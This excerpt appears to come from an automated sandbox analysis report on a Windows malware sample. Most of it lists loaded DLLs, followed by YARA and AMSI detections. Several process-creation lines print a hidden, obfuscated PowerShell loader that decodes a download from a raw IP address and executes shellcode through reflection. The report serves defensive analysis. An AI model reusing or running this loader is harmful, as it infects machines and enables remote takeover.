              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: propsys.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edputil.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.staterepositoryps.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: appresolver.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: bcp47langs.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: slc.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: userenv.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sppc.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: onecorecommonproxystub.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dnsapi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasadhlp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: fwpuclnt.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: schannel.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mskeyprotect.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntasn1.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dpapi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: gpapi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncrypt.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncryptsslp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winmm.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rstrtmgr.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32
              Source: Window Recorder Window detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2306982846.0000000007A69000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000005.00000002.2275976188.00000000035BE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2306982846.0000000007B15000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000005.00000002.2306982846.0000000007ABE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: em.Core.pdbpX) source: powershell.exe, 00000005.00000002.2306982846.0000000007B45000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb'$ source: powershell.exe, 00000005.00000002.2306982846.0000000007ABE000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              Source: Yara match File source: 00000005.00000002.2310523296.0000000009685000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000005.00000002.2310422489.0000000008E60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000005.00000002.2304485459.0000000006292000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000002.00000002.2497877400.00000210BCD05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Fedthasenes)$global:Kasinoernes = [System.Text.Encoding]::ASCII.GetString($Strghandlens)$global:Tommie=$Kasinoernes.substring(298043,27863)<#Staynil Stningsbygningerne Gneu Fangetran
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Unexpressibleness $Bagladeren $Admissus221), (Unmuscularly @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Hydrogenolysis = [AppDomain]::CurrentDomain.GetA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Retspraksisenes)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Supercapableness, $false).DefineType($Ext
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Fedthasenes)$global:Kasinoernes = [System.Text.Encoding]::ASCII.GetString($Strghandlens)$global:Tommie=$Kasinoernes.substring(298043,27863)<#Staynil Stningsbygningerne Gneu Fangetran
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Nabolandenes = 1;$Kapsle='S';$Kapsle+='ubstrin';$Kapsle+='g';Function Handig($Fyldepenneblkket){$Bytteforholdet=$Fyldepenneblkket.Length-$Nabolandenes;For($Columbaries=4; $Columbaries -lt $Bytteforholdet; $Columbaries+=(5)){$Festskriftets+=$Fyldepenneblkket.$Kapsle.Invoke( $Columbaries, $Nabolandenes);}$Festskriftets;}function Xerotherm($Drapers){& ($Normalprisen) ($Drapers);}$Palmehavers=Handig 'K njMResaoAfstznedsiFestl urlFokuaUnr /half5Re,u. Unb0bld Tan(PostWFrekiSpeenGarddv,cioInf.wSings Hea BracN RoqTL.at Babo1D,mi0Qq.a.Sten0Prop;Thec DefiWNonciEtagnOpry6Amel4Topc;Gela HetzxIndk6Comp4F.rt;Bill Erhvr Denv N.n:.syc1Basi2sdsu1ge t.Jens0 Spa)Prim UnboGStameSleec,fskkLovloMain/ .om2Nulp0Carb1F rr0Reor0Offi1.ykk0Ahis1Tffe TreF Twoiunwrr DiseSvrdfGattos,rix Ibr/Poli1Far.2Dump1 As .Enhy0Thus ';$Nysseliges=Handig ',undU Eges ignesnotr Ins-AlbuA,lleg,useeUpstnIsoitAnni ';$Fordommes=Handig ' odeh ZigtGacatJ,jup Fl,:.ent/B gg/ lor8Aden7Tors.Do.m1Mult2 Und1dy,n.unbr1cute0 Reg5Appl.Mast1 ic6A mb3Dete/FiltTUnexeKonsrwa.smAut.i rovnSka.aStocl PatjBipaoTigebD sk.OvertMetaoEkspcRhab ';$Problemanalysernes=Handig 'Uro.>Fe.l ';$Normalprisen=Handig 'Mic.iSkaaeRegex Str ';$Schizophasia='Heterozygotes';Xerotherm (Handig 'UndeSRegoePas.tDehu- Je C Stio UnsnGeomtUnteeTalln Re.tSpir Stil-BeatPImpra StetplurhSl.g Ko,mT H.b:Part\Sp,nK.also,mpir AlysNitre W mtSemisMonr.T.att Ch xs,nstDisp ,fsk-FuglV La,aTipslSkaruLa,se Bo lr t$ uscSMisac HydhR.kei looz KigoRep.pLderhAcicaDisrsAppeiAggra,rro;Ge e ');Xerotherm (Handig ' S,pi Chef ,or Labr(AaletFacoe TorsDub tindk- StrpMalaaHeavtTi.eh,ndi H neT Li.:sp l\DemoKAbsooRekorMenisA.foeUnsctUn es.eta.UnibtBentx Adet A.s)Kvin{eksae Pasx,oeci RentEqua} Fer;trop ');$Wedeln = Handig 'NonmedemycBedeh iewoFor edan%kon.al,plpFarmpMakedAra aWoodtBisuaRaft% Gen\Ma,ePRikslTilleSpaau 
oodrFun.oSenstForbhC.mpoLys,t Tito Ca nUnblu Ma,sAmer.ImprDDistiDi,il Las Gara&Post&Staf C,loeF.tocGennhFangoChi, Tor$Over ';Xerotherm (Handig 'tore$ mangOthilTriloUnstbTr,na.aval ove:paabSOpt.w EngeDir.eLus pAntryT pe=Gaze(S ecc StrmPnhedUdda Fejl/,avlcPr t Utl$,agsWTrine,ilbd DydeFly.lTy.inKar.)Plat ');Xerotherm (Handig 'Pr s$BriegStral ,odoNo,ib ,ndaIntelSu.e:FacoD CleeDo.ab PriaNarktbeeftKonte VaraBramtUds.rCam eIc.nn StoeUtths Reu=Tall$PlamFAn.no F rrStradc.iboDisgmNstemIns,eKlarsCali.Pr bsdetepKr,vlReaciSangt Urf(Gill$TeisP Sk.rE spoPrombB tol DomeCuttmT,lda.allnRhamaJordlopryyPicksWo keArtsrBox.n PrleA,etsAfsp)Slad ');$Fordommes=$Debatteatrenes[0];Xerotherm (Handig ' era$Leucg irklSpeeoF.nabEncaaBal,lCent:B atUStj.rOplaeAmphtGeore f arSouroBagggfor.r ephaLoc.pA sehBars=AlfaN redeKaglwBlyg- accO AntbForlj BoneUgudcAntetDiff LogaSPulvyKonfs A btBilleN,dumMikr.AtomNSysteHetetM.ni.,andWMarke.ussb Si.CS lvlPh.ni P,ceNondnQuintOpsp ');Xerotherm (Handig 'Spin$,jouUBehjrAnt,eTro,tAfstebrikrI.dsoArbegSupprAdgaaReflp Ambh Ec..ToplHGlobeS,beaBedudgrateMor.
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Nabolandenes = 1;$Kapsle='S';$Kapsle+='ubstrin';$Kapsle+='g';Function Handig($Fyldepenneblkket){$Bytteforholdet=$Fyldepenneblkket.Length-$Nabolandenes;For($Columbaries=4; $Columbaries -lt $Bytteforholdet; $Columbaries+=(5)){$Festskriftets+=$Fyldepenneblkket.$Kapsle.Invoke( $Columbaries, $Nabolandenes);}$Festskriftets;}function Xerotherm($Drapers){& ($Normalprisen) ($Drapers);}$Palmehavers=Handig 'K njMResaoAfstznedsiFestl urlFokuaUnr /half5Re,u. Unb0bld Tan(PostWFrekiSpeenGarddv,cioInf.wSings Hea BracN RoqTL.at Babo1D,mi0Qq.a.Sten0Prop;Thec DefiWNonciEtagnOpry6Amel4Topc;Gela HetzxIndk6Comp4F.rt;Bill Erhvr Denv N.n:.syc1Basi2sdsu1ge t.Jens0 Spa)Prim UnboGStameSleec,fskkLovloMain/ .om2Nulp0Carb1F rr0Reor0Offi1.ykk0Ahis1Tffe TreF Twoiunwrr DiseSvrdfGattos,rix Ibr/Poli1Far.2Dump1 As .Enhy0Thus ';$Nysseliges=Handig ',undU Eges ignesnotr Ins-AlbuA,lleg,useeUpstnIsoitAnni ';$Fordommes=Handig ' odeh ZigtGacatJ,jup Fl,:.ent/B gg/ lor8Aden7Tors.Do.m1Mult2 Und1dy,n.unbr1cute0 Reg5Appl.Mast1 ic6A mb3Dete/FiltTUnexeKonsrwa.smAut.i rovnSka.aStocl PatjBipaoTigebD sk.OvertMetaoEkspcRhab ';$Problemanalysernes=Handig 'Uro.>Fe.l ';$Normalprisen=Handig 'Mic.iSkaaeRegex Str ';$Schizophasia='Heterozygotes';Xerotherm (Handig 'UndeSRegoePas.tDehu- Je C Stio UnsnGeomtUnteeTalln Re.tSpir Stil-BeatPImpra StetplurhSl.g Ko,mT H.b:Part\Sp,nK.also,mpir AlysNitre W mtSemisMonr.T.att Ch xs,nstDisp ,fsk-FuglV La,aTipslSkaruLa,se Bo lr t$ uscSMisac HydhR.kei looz KigoRep.pLderhAcicaDisrsAppeiAggra,rro;Ge e ');Xerotherm (Handig ' S,pi Chef ,or Labr(AaletFacoe TorsDub tindk- StrpMalaaHeavtTi.eh,ndi H neT Li.:sp l\DemoKAbsooRekorMenisA.foeUnsctUn es.eta.UnibtBentx Adet A.s)Kvin{eksae Pasx,oeci RentEqua} Fer;trop ');$Wedeln = Handig 'NonmedemycBedeh iewoFor edan%kon.al,plpFarmpMakedAra 
aWoodtBisuaRaft% Gen\Ma,ePRikslTilleSpaau oodrFun.oSenstForbhC.mpoLys,t Tito Ca nUnblu Ma,sAmer.ImprDDistiDi,il Las Gara&Post&Staf C,loeF.tocGennhFangoChi, Tor$Over ';Xerotherm (Handig 'tore$ mangOthilTriloUnstbTr,na.aval ove:paabSOpt.w EngeDir.eLus pAntryT pe=Gaze(S ecc StrmPnhedUdda Fejl/,avlcPr t Utl$,agsWTrine,ilbd DydeFly.lTy.inKar.)Plat ');Xerotherm (Handig 'Pr s$BriegStral ,odoNo,ib ,ndaIntelSu.e:FacoD CleeDo.ab PriaNarktbeeftKonte VaraBramtUds.rCam eIc.nn StoeUtths Reu=Tall$PlamFAn.no F rrStradc.iboDisgmNstemIns,eKlarsCali.Pr bsdetepKr,vlReaciSangt Urf(Gill$TeisP Sk.rE spoPrombB tol DomeCuttmT,lda.allnRhamaJordlopryyPicksWo keArtsrBox.n PrleA,etsAfsp)Slad ');$Fordommes=$Debatteatrenes[0];Xerotherm (Handig ' era$Leucg irklSpeeoF.nabEncaaBal,lCent:B atUStj.rOplaeAmphtGeore f arSouroBagggfor.r ephaLoc.pA sehBars=AlfaN redeKaglwBlyg- accO AntbForlj BoneUgudcAntetDiff LogaSPulvyKonfs A btBilleN,dumMikr.AtomNSysteHetetM.ni.,andWMarke.ussb Si.CS lvlPh.ni P,ceNondnQuintOpsp ');Xerotherm (Handig 'Spin$,jouUBehjrAnt,eTro,tAfstebrikrI.dsoArbegSupprAdgaaReflp Ambh Ec..ToplH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Nabolandenes = 1;$Kapsle='S';$Kapsle+='ubstrin';$Kapsle+='g';Function Handig($Fyldepenneblkket){$Bytteforholdet=$Fyldepenneblkket.Length-$Nabolandenes;For($Columbaries=4; $Columbaries -lt $Bytteforholdet; $Columbaries+=(5)){$Festskriftets+=$Fyldepenneblkket.$Kapsle.Invoke( $Columbaries, $Nabolandenes);}$Festskriftets;}function Xerotherm($Drapers){& ($Normalprisen) ($Drapers);}$Palmehavers=Handig 'K njMResaoAfstznedsiFestl urlFokuaUnr /half5Re,u. Unb0bld Tan(PostWFrekiSpeenGarddv,cioInf.wSings Hea BracN RoqTL.at Babo1D,mi0Qq.a.Sten0Prop;Thec DefiWNonciEtagnOpry6Amel4Topc;Gela HetzxIndk6Comp4F.rt;Bill Erhvr Denv N.n:.syc1Basi2sdsu1ge t.Jens0 Spa)Prim UnboGStameSleec,fskkLovloMain/ .om2Nulp0Carb1F rr0Reor0Offi1.ykk0Ahis1Tffe TreF Twoiunwrr DiseSvrdfGattos,rix Ibr/Poli1Far.2Dump1 As .Enhy0Thus ';$Nysseliges=Handig ',undU Eges ignesnotr Ins-AlbuA,lleg,useeUpstnIsoitAnni ';$Fordommes=Handig ' odeh ZigtGacatJ,jup Fl,:.ent/B gg/ lor8Aden7Tors.Do.m1Mult2 Und1dy,n.unbr1cute0 Reg5Appl.Mast1 ic6A mb3Dete/FiltTUnexeKonsrwa.smAut.i rovnSka.aStocl PatjBipaoTigebD sk.OvertMetaoEkspcRhab ';$Problemanalysernes=Handig 'Uro.>Fe.l ';$Normalprisen=Handig 'Mic.iSkaaeRegex Str ';$Schizophasia='Heterozygotes';Xerotherm (Handig 'UndeSRegoePas.tDehu- Je C Stio UnsnGeomtUnteeTalln Re.tSpir Stil-BeatPImpra StetplurhSl.g Ko,mT H.b:Part\Sp,nK.also,mpir AlysNitre W mtSemisMonr.T.att Ch xs,nstDisp ,fsk-FuglV La,aTipslSkaruLa,se Bo lr t$ uscSMisac HydhR.kei looz KigoRep.pLderhAcicaDisrsAppeiAggra,rro;Ge e ');Xerotherm (Handig ' S,pi Chef ,or Labr(AaletFacoe TorsDub tindk- StrpMalaaHeavtTi.eh,ndi H neT Li.:sp l\DemoKAbsooRekorMenisA.foeUnsctUn es.eta.UnibtBentx Adet A.s)Kvin{eksae Pasx,oeci RentEqua} Fer;trop ');$Wedeln = Handig 'NonmedemycBedeh iewoFor edan%kon.al,plpFarmpMakedAra aWoodtBisuaRaft% Gen\Ma,ePRikslTilleSpaau 
oodrFun.oSenstForbhC.mpoLys,t Tito Ca nUnblu Ma,sAmer.ImprDDistiDi,il Las Gara&Post&Staf C,loeF.tocGennhFangoChi, Tor$Over ';Xerotherm (Handig 'tore$ mangOthilTriloUnstbTr,na.aval ove:paabSOpt.w EngeDir.eLus pAntryT pe=Gaze(S ecc StrmPnhedUdda Fejl/,avlcPr t Utl$,agsWTrine,ilbd DydeFly.lTy.inKar.)Plat ');Xerotherm (Handig 'Pr s$BriegStral ,odoNo,ib ,ndaIntelSu.e:FacoD CleeDo.ab PriaNarktbeeftKonte VaraBramtUds.rCam eIc.nn StoeUtths Reu=Tall$PlamFAn.no F rrStradc.iboDisgmNstemIns,eKlarsCali.Pr bsdetepKr,vlReaciSangt Urf(Gill$TeisP Sk.rE spoPrombB tol DomeCuttmT,lda.allnRhamaJordlopryyPicksWo keArtsrBox.n PrleA,etsAfsp)Slad ');$Fordommes=$Debatteatrenes[0];Xerotherm (Handig ' era$Leucg irklSpeeoF.nabEncaaBal,lCent:B atUStj.rOplaeAmphtGeore f arSouroBagggfor.r ephaLoc.pA sehBars=AlfaN redeKaglwBlyg- accO AntbForlj BoneUgudcAntetDiff LogaSPulvyKonfs A btBilleN,dumMikr.AtomNSysteHetetM.ni.,andWMarke.ussb Si.CS lvlPh.ni P,ceNondnQuintOpsp ');Xerotherm (Handig 'Spin$,jouUBehjrAnt,eTro,tAfstebrikrI.dsoArbegSupprAdgaaReflp Ambh Ec..ToplHGlobeS,beaBedudgrateMor.Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Nabolandenes = 1;$Kapsle='S';$Kapsle+='ubstrin';$Kapsle+='g';Function Handig($Fyldepenneblkket){$Bytteforholdet=$Fyldepenneblkket.Length-$Nabolandenes;For($Columbaries=4; $Columbaries -lt $Bytteforholdet; $Columbaries+=(5)){$Festskriftets+=$Fyldepenneblkket.$Kapsle.Invoke( $Columbaries, $Nabolandenes);}$Festskriftets;}function Xerotherm($Drapers){& ($Normalprisen) ($Drapers);}$Palmehavers=Handig 'K njMResaoAfstznedsiFestl urlFokuaUnr /half5Re,u. Unb0bld Tan(PostWFrekiSpeenGarddv,cioInf.wSings Hea BracN RoqTL.at Babo1D,mi0Qq.a.Sten0Prop;Thec DefiWNonciEtagnOpry6Amel4Topc;Gela HetzxIndk6Comp4F.rt;Bill Erhvr Denv N.n:.syc1Basi2sdsu1ge t.Jens0 Spa)Prim UnboGStameSleec,fskkLovloMain/ .om2Nulp0Carb1F rr0Reor0Offi1.ykk0Ahis1Tffe TreF Twoiunwrr DiseSvrdfGattos,rix Ibr/Poli1Far.2Dump1 As .Enhy0Thus ';$Nysseliges=Handig ',undU Eges ignesnotr Ins-AlbuA,lleg,useeUpstnIsoitAnni ';$Fordommes=Handig ' odeh ZigtGacatJ,jup Fl,:.ent/B gg/ lor8Aden7Tors.Do.m1Mult2 Und1dy,n.unbr1cute0 Reg5Appl.Mast1 ic6A mb3Dete/FiltTUnexeKonsrwa.smAut.i rovnSka.aStocl PatjBipaoTigebD sk.OvertMetaoEkspcRhab 